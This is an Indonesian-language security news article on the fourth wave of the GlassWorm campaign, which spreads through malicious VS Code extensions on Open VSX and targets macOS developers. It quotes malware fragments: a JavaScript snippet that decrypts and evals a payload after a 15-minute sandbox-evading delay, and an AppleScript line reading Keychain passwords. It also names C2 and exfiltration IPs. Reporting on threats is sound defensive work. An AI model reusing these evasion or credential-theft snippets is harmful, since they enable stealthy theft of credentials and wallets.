Ancaman malware kembali berevolusi. Kali ini, malware bernama GlassWorm muncul dengan strategi yang jauh lebih berbahaya, khususnya bagi pengguna macOS. Jika sebelumnya malware sejenis lebih sering menargetkan sistem Windows, kini GlassWorm justru mengalihkan fokusnya ke ekosistem Apple melalui jalur yang tidak terduga, yaitu ekstensi Visual Studio Code (VS Code).
Baca Juga : Apple Tutup Celah Keamanan Parah di iPhone dan iPad, Segera Update!
GlassWorm menyebar secara otomatis lewat ekstensi berbahaya yang diunggah ke Open VSX Marketplace, sebuah repositori ekstensi yang banyak digunakan oleh developer. Hingga terdeteksi, ekstensi-ekstensi ini tercatat sudah diunduh lebih dari 50.000 kali, angka yang cukup mengkhawatirkan mengingat targetnya adalah kalangan teknis.
Dari Windows ke macOS
.webp "Dari Windows ke macOS")
Gelombang terbaru ini merupakan gelombang keempat dari kampanye GlassWorm sejak pertama kali muncul pada Oktober lalu. Menariknya, setiap gelombang menunjukkan kemampuan adaptasi pelaku yang sangat tinggi.
Pada versi sebelumnya, malware ini memanfaatkan karakter Unicode tak terlihat dan binary Rust yang dikompilasi untuk menyamarkan kode berbahaya. Namun, pendekatan tersebut kini ditinggalkan. Pada gelombang keempat, pelaku beralih menggunakan payload JavaScript terenkripsi AES-256-CBC yang dirancang khusus untuk lingkungan macOS.
Perubahan ini bukan sekadar teknis, tetapi menunjukkan pemahaman mendalam terhadap cara kerja sistem keamanan modern, terutama yang biasa digunakan untuk memindai ekstensi developer.
Ekstensi Berbahaya yang Teridentifikasi
Peneliti keamanan menemukan tiga ekstensi mencurigakan di Open VSX Marketplace yang saling terhubung:
-
pro-svelte-extension
-
vsce-prettier-pro
-
full-access-catppuccin-pro-extension
Ketiganya menggunakan infrastruktur yang sama, termasuk kunci enkripsi dan metode komunikasi identik. Hal ini memperkuat dugaan bahwa seluruh kampanye dijalankan oleh satu threat actor yang sama.
Command & Control Lewat Blockchain Solana
Salah satu aspek paling mengkhawatirkan dari GlassWorm adalah penggunaan blockchain Solana sebagai sistem command-and-control (C2). Pendekatan ini membuat upaya pemutusan akses menjadi hampir mustahil.
Alih-alih menggunakan domain atau server konvensional, pelaku menyisipkan URL terenkripsi berbasis base64 di dalam memo transaksi blockchain. Dengan cara ini, malware dapat membaca perintah terbaru langsung dari jaringan blockchain yang bersifat terdesentralisasi dan tidak bisa diblokir dengan metode biasa.
Infrastruktur ini ditelusuri hingga ke alamat IP 45.32.151.157, yang juga digunakan pada gelombang ketiga, menegaskan kesinambungan operasi malware ini.
Terungkap Lewat Analisis Perilaku
Tim analis dari Koi Security berhasil mengidentifikasi GlassWorm bukan dari tanda tangan malware, melainkan melalui analisis perilaku. Mesin risiko mereka mendeteksi pola tidak wajar pada perilaku ekstensi dan lalu lintas jaringan yang dihasilkan.
Pendekatan ini terbukti efektif, terutama karena malware modern seperti GlassWorm sengaja dirancang untuk terlihat “normal” saat dipindai secara otomatis.
Payload Terenkripsi dan Teknik Mengelabui Sandbox
Pada gelombang keempat, GlassWorm memperkenalkan mekanisme waktu yang sangat cerdas. Setelah ekstensi dipasang, malware tidak langsung aktif, melainkan menunggu tepat 15 menit sebelum mengeksekusi payload berbahaya.
Penundaan ini sangat krusial karena sebagian besar lingkungan sandbox keamanan hanya berjalan selama sekitar 5 menit. Akibatnya, selama proses pemindaian otomatis, ekstensi terlihat sepenuhnya aman.
Di dalam kode, terdapat nilai waktu 900.000 milidetik (15 menit) yang memicu proses dekripsi dan eksekusi payload AES-256-CBC.
setTimeout(() => {
const decrypted = crypto.createDecipheriv(‘aes-256-cbc’, key, iv);
let payload = decrypted.update(encryptedData, ‘base64’, ‘utf8’);
payload += decrypted.final(‘utf8’);
eval(payload);
}, 9e5);
.webp "Payload Terenkripsi dan Teknik Mengelabui Sandbox")
Payload terenkripsi ini disisipkan langsung di file utama ekstensi dan menggunakan kunci serta initialization vector yang sama di ketiga ekstensi berbahaya, memperkuat bukti satu pelaku tunggal.
Target Spesifik macOS dan Hardware Wallet
Setelah waktu tunggu berakhir, malware mengambil alamat server C2 terbaru dari blockchain Solana dan menjalankan perintah yang diterima. Payload khusus macOS ini memanfaatkan AppleScript untuk eksekusi diam-diam, menggunakan LaunchAgents untuk persistensi, dan secara langsung mengakses Keychain macOS untuk mencuri kredensial.
set keychainPassword to do shell script “security find-generic-password -s ‘password_service’ -w”
Tak hanya itu, GlassWorm juga memiliki kemampuan untuk mengganti aplikasi hardware wallet dengan versi trojan. Target utamanya adalah Ledger Live dan Trezor Suite. Meski fitur ini belum aktif sepenuhnya saat pengujian pada 29 Desember 2025, seluruh infrastruktur kodenya sudah siap menunggu payload tambahan.
Untuk menghindari kesalahan instalasi yang bisa memicu kecurigaan korban, malware hanya akan memasang file yang ukurannya lebih dari 1.000 byte.
Proses Pencurian Data
Semua data yang berhasil dicuri akan dikumpulkan di direktori sementara /tmp/ijewf/, kemudian dikompresi dan dikirim ke server eksfiltrasi di 45.32.150.251/p2p untuk diambil oleh pelaku.
Baca Juga : Heboh! Pelaku Kejahatan Cyber Diduga Jual Eksploit 0-Day iOS 16 di Dark Web
GlassWorm bukan malware biasa. Kombinasi antara ekstensi developer, payload terenkripsi, sandbox evasion, dan blockchain sebagai C2 menjadikannya ancaman serius, khususnya bagi pengguna macOS yang aktif menggunakan VS Code. Ini menjadi pengingat penting bahwa bahkan tools yang terlihat “aman” di ekosistem developer pun tetap perlu diwaspadai.
